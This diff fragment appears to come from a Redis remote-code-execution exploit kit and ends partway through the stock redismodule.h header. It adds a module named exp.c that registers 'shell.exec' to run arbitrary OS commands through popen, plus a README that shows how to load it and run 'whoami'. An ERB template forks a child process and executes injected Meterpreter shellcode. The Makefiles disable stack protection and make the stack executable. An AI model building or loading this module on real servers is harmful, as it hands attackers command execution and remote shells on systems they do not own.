+CFLAGS = -I$(RM_INCLUDE_DIR) -Wall -g -fPIC -lc -lm -std=gnu99 -fno-stack-protector -z execstack 
+CC=gcc
+
+all: rmutil module.so
+
+rmutil: FORCE
+	$(MAKE) -C $(RMUTIL_LIBDIR)
+
+module.so: module.o
+	$(LD) -o $@ module.o $(SHOBJ_LDFLAGS) $(LIBS) -L$(RMUTIL_LIBDIR) -lrmutil -lc -z execstack
+
+clean:
+	rm -rf *.xo *.so *.o
+
+FORCE:
@@ -0,0 +1,35 @@
+#set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=../
+endif
+
+ifndef RMUTIL_LIBDIR
+	RMUTIL_LIBDIR=../rmutil
+endif
+
+# find the OS
+uname_S := $(shell sh -c 'uname -s 2>/dev/null || echo not')
+
+# Compile flags for linux / osx
+ifeq ($(uname_S),Linux)
+	SHOBJ_CFLAGS ?=  -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -shared -Bsymbolic
+else
+	SHOBJ_CFLAGS ?= -dynamic -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -bundle -undefined dynamic_lookup
+endif
+CFLAGS = -I$(RM_INCLUDE_DIR) -Wall -g -fPIC -lc -lm -std=gnu99 -fno-stack-protector -z execstack 
+CC=gcc
+
+all: rmutil exp.so
+
+rmutil: FORCE
+	$(MAKE) -C $(RMUTIL_LIBDIR)
+
+exp.so: exp.o
+	$(LD) -o $@ exp.o $(SHOBJ_LDFLAGS) $(LIBS) -L$(RMUTIL_LIBDIR) -lrmutil -lc -z execstack
+
+clean:
+	rm -rf *.xo *.so *.o
+
+FORCE:
@@ -0,0 +1,47 @@
+#include "redismodule.h"
+
+#include <stdio.h> 
+#include <unistd.h>  
+#include <stdlib.h> 
+#include <errno.h>   
+#include <sys/wait.h>
+#include <sys/types.h> 
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int Shell(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+        if (argc == 2) {
+                size_t cmd_len;
+                size_t size = 1024;
+                char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len);
+
+                FILE *fp = popen(cmd, "r");
+                char *buf, *output;
+                buf = (char *)malloc(size);
+                output = (char *)malloc(size);
+                while ( fgets(buf, sizeof(buf), fp) != 0 ) {
+                        if (strlen(buf) + strlen(output) >= size) {
+                                output = realloc(output, size<<2);
+                                size <<= 1;
+                        }
+                        strcat(output, buf);
+                }
+                RedisModuleString *ret = RedisModule_CreateString(ctx, output, strlen(output));
+                RedisModule_ReplyWithString(ctx, ret);
+                pclose(fp);
+        } else {
+                return RedisModule_WrongArity(ctx);
+        }
+        return REDISMODULE_OK;
+}
+
+int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+    if (RedisModule_Init(ctx,"shell",1,REDISMODULE_APIVER_1)
+                        == REDISMODULE_ERR) return REDISMODULE_ERR;
+
+    if (RedisModule_CreateCommand(ctx, "shell.exec",
+        Shell, "readonly", 1, 1, 1) == REDISMODULE_ERR)
+        return REDISMODULE_ERR;
+
+    return REDISMODULE_OK;
+}
@@ -0,0 +1,23 @@
+## Intro
+
+This is a compiled shared object file of redis module.
+
+## Load redis extension
+
+```
+MODULE load ./exp.so
+```
+
+## Run command
+
+```
+redis-cli
+127.0.0.1:6379> shell.exec "whoami"
+```
+## Compile
+
+You can modify the exp.c source code if you want.
+And the compile it to exp.so in current directory.
+```
+make
+```
@@ -0,0 +1,38 @@
+#include "redismodule.h"
+
+#include <stdio.h> 
+#include <unistd.h>  
+#include <stdlib.h> 
+#include <errno.h>   
+#include <sys/wait.h>
+#include <sys/types.h> 
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int Shell(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+
+    pid_t child_pid = fork();
+    if (child_pid == 0)
+    {
+        // Your meterpreter shell here
+        <%= buf %>
+
+        int (*ret)() = (int(*)())buf;
+        ret();
+    }
+    else
+        {wait(NULL);}
+
+    return REDISMODULE_OK;
+}
+
+
+int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+    if (RedisModule_Init(ctx,<%= @module_init_name.inspect %>,1,REDISMODULE_APIVER_1)
+                        == REDISMODULE_ERR) return REDISMODULE_ERR;
+
+    if (RedisModule_CreateCommand(ctx, <%= @module_cmd.inspect %>,
+        Shell, "readonly", 1, 1, 1) == REDISMODULE_ERR)
+        return REDISMODULE_ERR;
+    return REDISMODULE_OK;
+}
@@ -0,0 +1,509 @@
+#ifndef REDISMODULE_H
+#define REDISMODULE_H
+
+#include <sys/types.h>
+#include <stdint.h>
+#include <stdio.h>
+
+/* ---------------- Defines common between core and modules --------------- */
+
+/* Error status return values. */
+#define REDISMODULE_OK 0
+#define REDISMODULE_ERR 1
+
+/* API versions. */
+#define REDISMODULE_APIVER_1 1
+
+/* API flags and constants */
+#define REDISMODULE_READ (1<<0)
+#define REDISMODULE_WRITE (1<<1)
+
+#define REDISMODULE_LIST_HEAD 0
+#define REDISMODULE_LIST_TAIL 1
+
+/* Key types. */
+#define REDISMODULE_KEYTYPE_EMPTY 0
+#define REDISMODULE_KEYTYPE_STRING 1
+#define REDISMODULE_KEYTYPE_LIST 2
+#define REDISMODULE_KEYTYPE_HASH 3
+#define REDISMODULE_KEYTYPE_SET 4
+#define REDISMODULE_KEYTYPE_ZSET 5
+#define REDISMODULE_KEYTYPE_MODULE 6
+
+/* Reply types. */
+#define REDISMODULE_REPLY_UNKNOWN -1
+#define REDISMODULE_REPLY_STRING 0
+#define REDISMODULE_REPLY_ERROR 1
+#define REDISMODULE_REPLY_INTEGER 2
+#define REDISMODULE_REPLY_ARRAY 3
+#define REDISMODULE_REPLY_NULL 4
+
+/* Postponed array length. */
+#define REDISMODULE_POSTPONED_ARRAY_LEN -1
+
+/* Expire */
+#define REDISMODULE_NO_EXPIRE -1
+
+/* Sorted set API flags. */
+#define REDISMODULE_ZADD_XX      (1<<0)
+#define REDISMODULE_ZADD_NX      (1<<1)
+#define REDISMODULE_ZADD_ADDED   (1<<2)
+#define REDISMODULE_ZADD_UPDATED (1<<3)
+#define REDISMODULE_ZADD_NOP     (1<<4)
+
+/* Hash API flags. */
+#define REDISMODULE_HASH_NONE       0
+#define REDISMODULE_HASH_NX         (1<<0)
+#define REDISMODULE_HASH_XX         (1<<1)
+#define REDISMODULE_HASH_CFIELDS    (1<<2)
+#define REDISMODULE_HASH_EXISTS     (1<<3)
+
+/* Context Flags: Info about the current context returned by
+ * RM_GetContextFlags(). */
+
+/* The command is running in the context of a Lua script */
+#define REDISMODULE_CTX_FLAGS_LUA (1<<0)
+/* The command is running inside a Redis transaction */
+#define REDISMODULE_CTX_FLAGS_MULTI (1<<1)
+/* The instance is a master */
+#define REDISMODULE_CTX_FLAGS_MASTER (1<<2)
+/* The instance is a slave */
+#define REDISMODULE_CTX_FLAGS_SLAVE (1<<3)
+/* The instance is read-only (usually meaning it's a slave as well) */
+#define REDISMODULE_CTX_FLAGS_READONLY (1<<4)
+/* The instance is running in cluster mode */
+#define REDISMODULE_CTX_FLAGS_CLUSTER (1<<5)
+/* The instance has AOF enabled */
+#define REDISMODULE_CTX_FLAGS_AOF (1<<6)
+/* The instance has RDB enabled */
+#define REDISMODULE_CTX_FLAGS_RDB (1<<7)
+/* The instance has Maxmemory set */
+#define REDISMODULE_CTX_FLAGS_MAXMEMORY (1<<8)
+/* Maxmemory is set and has an eviction policy that may delete keys */
+#define REDISMODULE_CTX_FLAGS_EVICT (1<<9)
+/* Redis is out of memory according to the maxmemory flag. */
+#define REDISMODULE_CTX_FLAGS_OOM (1<<10)
+/* Less than 25% of memory available according to maxmemory. */
+#define REDISMODULE_CTX_FLAGS_OOM_WARNING (1<<11)
+
+#define REDISMODULE_NOTIFY_GENERIC (1<<2)     /* g */
+#define REDISMODULE_NOTIFY_STRING (1<<3)      /* $ */
+#define REDISMODULE_NOTIFY_LIST (1<<4)        /* l */
+#define REDISMODULE_NOTIFY_SET (1<<5)         /* s */
+#define REDISMODULE_NOTIFY_HASH (1<<6)        /* h */
+#define REDISMODULE_NOTIFY_ZSET (1<<7)        /* z */
+#define REDISMODULE_NOTIFY_EXPIRED (1<<8)     /* x */
+#define REDISMODULE_NOTIFY_EVICTED (1<<9)     /* e */
+#define REDISMODULE_NOTIFY_STREAM (1<<10)     /* t */
+#define REDISMODULE_NOTIFY_ALL (REDISMODULE_NOTIFY_GENERIC | REDISMODULE_NOTIFY_STRING | REDISMODULE_NOTIFY_LIST | REDISMODULE_NOTIFY_SET | REDISMODULE_NOTIFY_HASH | REDISMODULE_NOTIFY_ZSET | REDISMODULE_NOTIFY_EXPIRED | REDISMODULE_NOTIFY_EVICTED | REDISMODULE_NOTIFY_STREAM)      /* A */
+
+
+/* A special pointer that we can use between the core and the module to signal
+ * field deletion, and that is impossible to be a valid pointer. */
+#define REDISMODULE_HASH_DELETE ((RedisModuleString*)(long)1)
+
+/* Error messages. */
+#define REDISMODULE_ERRORMSG_WRONGTYPE "WRONGTYPE Operation against a key holding the wrong kind of value"
+
+#define REDISMODULE_POSITIVE_INFINITE (1.0/0.0)
+#define REDISMODULE_NEGATIVE_INFINITE (-1.0/0.0)
+
+/* Cluster API defines. */
+#define REDISMODULE_NODE_ID_LEN 40
+#define REDISMODULE_NODE_MYSELF     (1<<0)
+#define REDISMODULE_NODE_MASTER     (1<<1)
+#define REDISMODULE_NODE_SLAVE      (1<<2)
+#define REDISMODULE_NODE_PFAIL      (1<<3)
+#define REDISMODULE_NODE_FAIL       (1<<4)
+#define REDISMODULE_NODE_NOFAILOVER (1<<5)
+
+#define REDISMODULE_CLUSTER_FLAG_NONE 0
+#define REDISMODULE_CLUSTER_FLAG_NO_FAILOVER (1<<1)
+#define REDISMODULE_CLUSTER_FLAG_NO_REDIRECTION (1<<2)
+
+#define REDISMODULE_NOT_USED(V) ((void) V)
+
+/* This type represents a timer handle, and is returned when a timer is
+ * registered and used in order to invalidate a timer. It's just a 64 bit
+ * number, because this is how each timer is represented inside the radix tree
+ * of timers that are going to expire, sorted by expire time. */
+typedef uint64_t RedisModuleTimerID;
+
+/* ------------------------- End of common defines ------------------------ */
+
+#ifndef REDISMODULE_CORE
+
+typedef long long mstime_t;
+
+/* Incomplete structures for compiler checks but opaque access. */
+typedef struct RedisModuleCtx RedisModuleCtx;
+typedef struct RedisModuleKey RedisModuleKey;
+typedef struct RedisModuleString RedisModuleString;
+typedef struct RedisModuleCallReply RedisModuleCallReply;
+typedef struct RedisModuleIO RedisModuleIO;
+typedef struct RedisModuleType RedisModuleType;
+typedef struct RedisModuleDigest RedisModuleDigest;
+typedef struct RedisModuleBlockedClient RedisModuleBlockedClient;
+typedef struct RedisModuleClusterInfo RedisModuleClusterInfo;
+typedef struct RedisModuleDict RedisModuleDict;
+typedef struct RedisModuleDictIter RedisModuleDictIter;
+
+typedef int (*RedisModuleCmdFunc)(RedisModuleCtx *ctx, RedisModuleString **argv, int argc);
+typedef void (*RedisModuleDisconnectFunc)(RedisModuleCtx *ctx, RedisModuleBlockedClient *bc);
+typedef int (*RedisModuleNotificationFunc)(RedisModuleCtx *ctx, int type, const char *event, RedisModuleString *key);
+typedef void *(*RedisModuleTypeLoadFunc)(RedisModuleIO *rdb, int encver);
+typedef void (*RedisModuleTypeSaveFunc)(RedisModuleIO *rdb, void *value);
+typedef void (*RedisModuleTypeRewriteFunc)(RedisModuleIO *aof, RedisModuleString *key, void *value);
+typedef size_t (*RedisModuleTypeMemUsageFunc)(const void *value);
+typedef void (*RedisModuleTypeDigestFunc)(RedisModuleDigest *digest, void *value);
+typedef void (*RedisModuleTypeFreeFunc)(void *value);
+typedef void (*RedisModuleClusterMessageReceiver)(RedisModuleCtx *ctx, const char *sender_id, uint8_t type, const unsigned char *payload, uint32_t len);
+typedef void (*RedisModuleTimerProc)(RedisModuleCtx *ctx, void *data);
+
+#define REDISMODULE_TYPE_METHOD_VERSION 1
+typedef struct RedisModuleTypeMethods {
+    uint64_t version;
+    RedisModuleTypeLoadFunc rdb_load;
+    RedisModuleTypeSaveFunc rdb_save;
+    RedisModuleTypeRewriteFunc aof_rewrite;
+    RedisModuleTypeMemUsageFunc mem_usage;
+    RedisModuleTypeDigestFunc digest;
+    RedisModuleTypeFreeFunc free;
+} RedisModuleTypeMethods;
+
+#define REDISMODULE_GET_API(name) \
+    RedisModule_GetApi("RedisModule_" #name, ((void **)&RedisModule_ ## name))
+
+#define REDISMODULE_API_FUNC(x) (*x)
+
+
+void *REDISMODULE_API_FUNC(RedisModule_Alloc)(size_t bytes);
+void *REDISMODULE_API_FUNC(RedisModule_Realloc)(void *ptr, size_t bytes);
+void REDISMODULE_API_FUNC(RedisModule_Free)(void *ptr);
+void *REDISMODULE_API_FUNC(RedisModule_Calloc)(size_t nmemb, size_t size);
+char *REDISMODULE_API_FUNC(RedisModule_Strdup)(const char *str);
+int REDISMODULE_API_FUNC(RedisModule_GetApi)(const char *, void *);
+int REDISMODULE_API_FUNC(RedisModule_CreateCommand)(RedisModuleCtx *ctx, const char *name, RedisModuleCmdFunc cmdfunc, const char *strflags, int firstkey, int lastkey, int keystep);
+void REDISMODULE_API_FUNC(RedisModule_SetModuleAttribs)(RedisModuleCtx *ctx, const char *name, int ver, int apiver);
+int REDISMODULE_API_FUNC(RedisModule_IsModuleNameBusy)(const char *name);
+int REDISMODULE_API_FUNC(RedisModule_WrongArity)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithLongLong)(RedisModuleCtx *ctx, long long ll);
+int REDISMODULE_API_FUNC(RedisModule_GetSelectedDb)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_SelectDb)(RedisModuleCtx *ctx, int newid);
+void *REDISMODULE_API_FUNC(RedisModule_OpenKey)(RedisModuleCtx *ctx, RedisModuleString *keyname, int mode);
+void REDISMODULE_API_FUNC(RedisModule_CloseKey)(RedisModuleKey *kp);
+int REDISMODULE_API_FUNC(RedisModule_KeyType)(RedisModuleKey *kp);
+size_t REDISMODULE_API_FUNC(RedisModule_ValueLength)(RedisModuleKey *kp);
+int REDISMODULE_API_FUNC(RedisModule_ListPush)(RedisModuleKey *kp, int where, RedisModuleString *ele);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_ListPop)(RedisModuleKey *key, int where);
+RedisModuleCallReply *REDISMODULE_API_FUNC(RedisModule_Call)(RedisModuleCtx *ctx, const char *cmdname, const char *fmt, ...);
+const char *REDISMODULE_API_FUNC(RedisModule_CallReplyProto)(RedisModuleCallReply *reply, size_t *len);
+void REDISMODULE_API_FUNC(RedisModule_FreeCallReply)(RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_CallReplyType)(RedisModuleCallReply *reply);
+long long REDISMODULE_API_FUNC(RedisModule_CallReplyInteger)(RedisModuleCallReply *reply);
+size_t REDISMODULE_API_FUNC(RedisModule_CallReplyLength)(RedisModuleCallReply *reply);
+RedisModuleCallReply *REDISMODULE_API_FUNC(RedisModule_CallReplyArrayElement)(RedisModuleCallReply *reply, size_t idx);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateString)(RedisModuleCtx *ctx, const char *ptr, size_t len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromLongLong)(RedisModuleCtx *ctx, long long ll);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromString)(RedisModuleCtx *ctx, const RedisModuleString *str);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringPrintf)(RedisModuleCtx *ctx, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_FreeString)(RedisModuleCtx *ctx, RedisModuleString *str);
+const char *REDISMODULE_API_FUNC(RedisModule_StringPtrLen)(const RedisModuleString *str, size_t *len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithError)(RedisModuleCtx *ctx, const char *err);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithSimpleString)(RedisModuleCtx *ctx, const char *msg);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithArray)(RedisModuleCtx *ctx, long len);
+void REDISMODULE_API_FUNC(RedisModule_ReplySetArrayLength)(RedisModuleCtx *ctx, long len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithStringBuffer)(RedisModuleCtx *ctx, const char *buf, size_t len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithString)(RedisModuleCtx *ctx, RedisModuleString *str);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithNull)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithDouble)(RedisModuleCtx *ctx, double d);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithCallReply)(RedisModuleCtx *ctx, RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_StringToLongLong)(const RedisModuleString *str, long long *ll);
+int REDISMODULE_API_FUNC(RedisModule_StringToDouble)(const RedisModuleString *str, double *d);
+void REDISMODULE_API_FUNC(RedisModule_AutoMemory)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_Replicate)(RedisModuleCtx *ctx, const char *cmdname, const char *fmt, ...);
+int REDISMODULE_API_FUNC(RedisModule_ReplicateVerbatim)(RedisModuleCtx *ctx);
+const char *REDISMODULE_API_FUNC(RedisModule_CallReplyStringPtr)(RedisModuleCallReply *reply, size_t *len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromCallReply)(RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_DeleteKey)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_UnlinkKey)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_StringSet)(RedisModuleKey *key, RedisModuleString *str);
+char *REDISMODULE_API_FUNC(RedisModule_StringDMA)(RedisModuleKey *key, size_t *len, int mode);
+int REDISMODULE_API_FUNC(RedisModule_StringTruncate)(RedisModuleKey *key, size_t newlen);
+mstime_t REDISMODULE_API_FUNC(RedisModule_GetExpire)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_SetExpire)(RedisModuleKey *key, mstime_t expire);
+int REDISMODULE_API_FUNC(RedisModule_ZsetAdd)(RedisModuleKey *key, double score, RedisModuleString *ele, int *flagsptr);
+int REDISMODULE_API_FUNC(RedisModule_ZsetIncrby)(RedisModuleKey *key, double score, RedisModuleString *ele, int *flagsptr, double *newscore);
+int REDISMODULE_API_FUNC(RedisModule_ZsetScore)(RedisModuleKey *key, RedisModuleString *ele, double *score);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRem)(RedisModuleKey *key, RedisModuleString *ele, int *deleted);
+void REDISMODULE_API_FUNC(RedisModule_ZsetRangeStop)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetFirstInScoreRange)(RedisModuleKey *key, double min, double max, int minex, int maxex);
+int REDISMODULE_API_FUNC(RedisModule_ZsetLastInScoreRange)(RedisModuleKey *key, double min, double max, int minex, int maxex);
+int REDISMODULE_API_FUNC(RedisModule_ZsetFirstInLexRange)(RedisModuleKey *key, RedisModuleString *min, RedisModuleString *max);
+int REDISMODULE_API_FUNC(RedisModule_ZsetLastInLexRange)(RedisModuleKey *key, RedisModuleString *min, RedisModuleString *max);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_ZsetRangeCurrentElement)(RedisModuleKey *key, double *score);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangeNext)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangePrev)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangeEndReached)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_HashSet)(RedisModuleKey *key, int flags, ...);
+int REDISMODULE_API_FUNC(RedisModule_HashGet)(RedisModuleKey *key, int flags, ...);
+int REDISMODULE_API_FUNC(RedisModule_IsKeysPositionRequest)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_KeyAtPos)(RedisModuleCtx *ctx, int pos);
+unsigned long long REDISMODULE_API_FUNC(RedisModule_GetClientId)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_GetContextFlags)(RedisModuleCtx *ctx);
+void *REDISMODULE_API_FUNC(RedisModule_PoolAlloc)(RedisModuleCtx *ctx, size_t bytes);
+RedisModuleType *REDISMODULE_API_FUNC(RedisModule_CreateDataType)(RedisModuleCtx *ctx, const char *name, int encver, RedisModuleTypeMethods *typemethods);
+int REDISMODULE_API_FUNC(RedisModule_ModuleTypeSetValue)(RedisModuleKey *key, RedisModuleType *mt, void *value);
+RedisModuleType *REDISMODULE_API_FUNC(RedisModule_ModuleTypeGetType)(RedisModuleKey *key);
+void *REDISMODULE_API_FUNC(RedisModule_ModuleTypeGetValue)(RedisModuleKey *key);
+void REDISMODULE_API_FUNC(RedisModule_SaveUnsigned)(RedisModuleIO *io, uint64_t value);
+uint64_t REDISMODULE_API_FUNC(RedisModule_LoadUnsigned)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_SaveSigned)(RedisModuleIO *io, int64_t value);
+int64_t REDISMODULE_API_FUNC(RedisModule_LoadSigned)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_EmitAOF)(RedisModuleIO *io, const char *cmdname, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_SaveString)(RedisModuleIO *io, RedisModuleString *s);
+void REDISMODULE_API_FUNC(RedisModule_SaveStringBuffer)(RedisModuleIO *io, const char *str, size_t len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_LoadString)(RedisModuleIO *io);
+char *REDISMODULE_API_FUNC(RedisModule_LoadStringBuffer)(RedisModuleIO *io, size_t *lenptr);
+void REDISMODULE_API_FUNC(RedisModule_SaveDouble)(RedisModuleIO *io, double value);
+double REDISMODULE_API_FUNC(RedisModule_LoadDouble)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_SaveFloat)(RedisModuleIO *io, float value);
+float REDISMODULE_API_FUNC(RedisModule_LoadFloat)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_Log)(RedisModuleCtx *ctx, const char *level, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_LogIOError)(RedisModuleIO *io, const char *levelstr, const char *fmt, ...);
+int REDISMODULE_API_FUNC(RedisModule_StringAppendBuffer)(RedisModuleCtx *ctx, RedisModuleString *str, const char *buf, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_RetainString)(RedisModuleCtx *ctx, RedisModuleString *str);
+int REDISMODULE_API_FUNC(RedisModule_StringCompare)(RedisModuleString *a, RedisModuleString *b);
+RedisModuleCtx *REDISMODULE_API_FUNC(RedisModule_GetContextFromIO)(RedisModuleIO *io);
+long long REDISMODULE_API_FUNC(RedisModule_Milliseconds)(void);
+void REDISMODULE_API_FUNC(RedisModule_DigestAddStringBuffer)(RedisModuleDigest *md, unsigned char *ele, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_DigestAddLongLong)(RedisModuleDigest *md, long long ele);
+void REDISMODULE_API_FUNC(RedisModule_DigestEndSequence)(RedisModuleDigest *md);
+RedisModuleDict *REDISMODULE_API_FUNC(RedisModule_CreateDict)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_FreeDict)(RedisModuleCtx *ctx, RedisModuleDict *d);
+uint64_t REDISMODULE_API_FUNC(RedisModule_DictSize)(RedisModuleDict *d);
+int REDISMODULE_API_FUNC(RedisModule_DictSetC)(RedisModuleDict *d, void *key, size_t keylen, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictReplaceC)(RedisModuleDict *d, void *key, size_t keylen, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictSet)(RedisModuleDict *d, RedisModuleString *key, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictReplace)(RedisModuleDict *d, RedisModuleString *key, void *ptr);
+void *REDISMODULE_API_FUNC(RedisModule_DictGetC)(RedisModuleDict *d, void *key, size_t keylen, int *nokey);
+void *REDISMODULE_API_FUNC(RedisModule_DictGet)(RedisModuleDict *d, RedisModuleString *key, int *nokey);
+int REDISMODULE_API_FUNC(RedisModule_DictDelC)(RedisModuleDict *d, void *key, size_t keylen, void *oldval);
+int REDISMODULE_API_FUNC(RedisModule_DictDel)(RedisModuleDict *d, RedisModuleString *key, void *oldval);
+RedisModuleDictIter *REDISMODULE_API_FUNC(RedisModule_DictIteratorStartC)(RedisModuleDict *d, const char *op, void *key, size_t keylen);
+RedisModuleDictIter *REDISMODULE_API_FUNC(RedisModule_DictIteratorStart)(RedisModuleDict *d, const char *op, RedisModuleString *key);
+void REDISMODULE_API_FUNC(RedisModule_DictIteratorStop)(RedisModuleDictIter *di);
+int REDISMODULE_API_FUNC(RedisModule_DictIteratorReseekC)(RedisModuleDictIter *di, const char *op, void *key, size_t keylen);
+int REDISMODULE_API_FUNC(RedisModule_DictIteratorReseek)(RedisModuleDictIter *di, const char *op, RedisModuleString *key);
+void *REDISMODULE_API_FUNC(RedisModule_DictNextC)(RedisModuleDictIter *di, size_t *keylen, void **dataptr);
+void *REDISMODULE_API_FUNC(RedisModule_DictPrevC)(RedisModuleDictIter *di, size_t *keylen, void **dataptr);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_DictNext)(RedisModuleCtx *ctx, RedisModuleDictIter *di, void **dataptr);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_DictPrev)(RedisModuleCtx *ctx, RedisModuleDictIter *di, void **dataptr);
+int REDISMODULE_API_FUNC(RedisModule_DictCompareC)(RedisModuleDictIter *di, const char *op, void *key, size_t keylen);
+int REDISMODULE_API_FUNC(RedisModule_DictCompare)(RedisModuleDictIter *di, const char *op, RedisModuleString *key);
+
+/* Experimental APIs */
+#ifdef REDISMODULE_EXPERIMENTAL_API
+#define REDISMODULE_EXPERIMENTAL_API_VERSION 3
+RedisModuleBlockedClient *REDISMODULE_API_FUNC(RedisModule_BlockClient)(RedisModuleCtx *ctx, RedisModuleCmdFunc reply_callback, RedisModuleCmdFunc timeout_callback, void (*free_privdata)(RedisModuleCtx*,void*), long long timeout_ms);
+int REDISMODULE_API_FUNC(RedisModule_UnblockClient)(RedisModuleBlockedClient *bc, void *privdata);
+int REDISMODULE_API_FUNC(RedisModule_IsBlockedReplyRequest)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_IsBlockedTimeoutRequest)(RedisModuleCtx *ctx);
+void *REDISMODULE_API_FUNC(RedisModule_GetBlockedClientPrivateData)(RedisModuleCtx *ctx);
+RedisModuleBlockedClient *REDISMODULE_API_FUNC(RedisModule_GetBlockedClientHandle)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_AbortBlock)(RedisModuleBlockedClient *bc);
+RedisModuleCtx *REDISMODULE_API_FUNC(RedisModule_GetThreadSafeContext)(RedisModuleBlockedClient *bc);
+void REDISMODULE_API_FUNC(RedisModule_FreeThreadSafeContext)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_ThreadSafeContextLock)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_ThreadSafeContextUnlock)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_SubscribeToKeyspaceEvents)(RedisModuleCtx *ctx, int types, RedisModuleNotificationFunc cb);
+int REDISMODULE_API_FUNC(RedisModule_BlockedClientDisconnected)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_RegisterClusterMessageReceiver)(RedisModuleCtx *ctx, uint8_t type, RedisModuleClusterMessageReceiver callback);
+int REDISMODULE_API_FUNC(RedisModule_SendClusterMessage)(RedisModuleCtx *ctx, char *target_id, uint8_t type, unsigned char *msg, uint32_t len);
+int REDISMODULE_API_FUNC(RedisModule_GetClusterNodeInfo)(RedisModuleCtx *ctx, const char *id, char *ip, char *master_id, int *port, int *flags);
+char **REDISMODULE_API_FUNC(RedisModule_GetClusterNodesList)(RedisModuleCtx *ctx, size_t *numnodes);
+void REDISMODULE_API_FUNC(RedisModule_FreeClusterNodesList)(char **ids);
+RedisModuleTimerID REDISMODULE_API_FUNC(RedisModule_CreateTimer)(RedisModuleCtx *ctx, mstime_t period, RedisModuleTimerProc callback, void *data);
+int REDISMODULE_API_FUNC(RedisModule_StopTimer)(RedisModuleCtx *ctx, RedisModuleTimerID id, void **data);
+int REDISMODULE_API_FUNC(RedisModule_GetTimerInfo)(RedisModuleCtx *ctx, RedisModuleTimerID id, uint64_t *remaining, void **data);
+const char *REDISMODULE_API_FUNC(RedisModule_GetMyClusterID)(void);
+size_t REDISMODULE_API_FUNC(RedisModule_GetClusterSize)(void);
+void REDISMODULE_API_FUNC(RedisModule_GetRandomBytes)(unsigned char *dst, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_GetRandomHexChars)(char *dst, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_SetDisconnectCallback)(RedisModuleBlockedClient *bc, RedisModuleDisconnectFunc callback);
+void REDISMODULE_API_FUNC(RedisModule_SetClusterFlags)(RedisModuleCtx *ctx, uint64_t flags);
+#endif
+
+/* This is included inline inside each Redis module. */
+static int RedisModule_Init(RedisModuleCtx *ctx, const char *name, int ver, int apiver) __attribute__((unused));
+static int RedisModule_Init(RedisModuleCtx *ctx, const char *name, int ver, int apiver) {
+    void *getapifuncptr = ((void**)ctx)[0];
+    RedisModule_GetApi = (int (*)(const char *, void *)) (unsigned long)getapifuncptr;
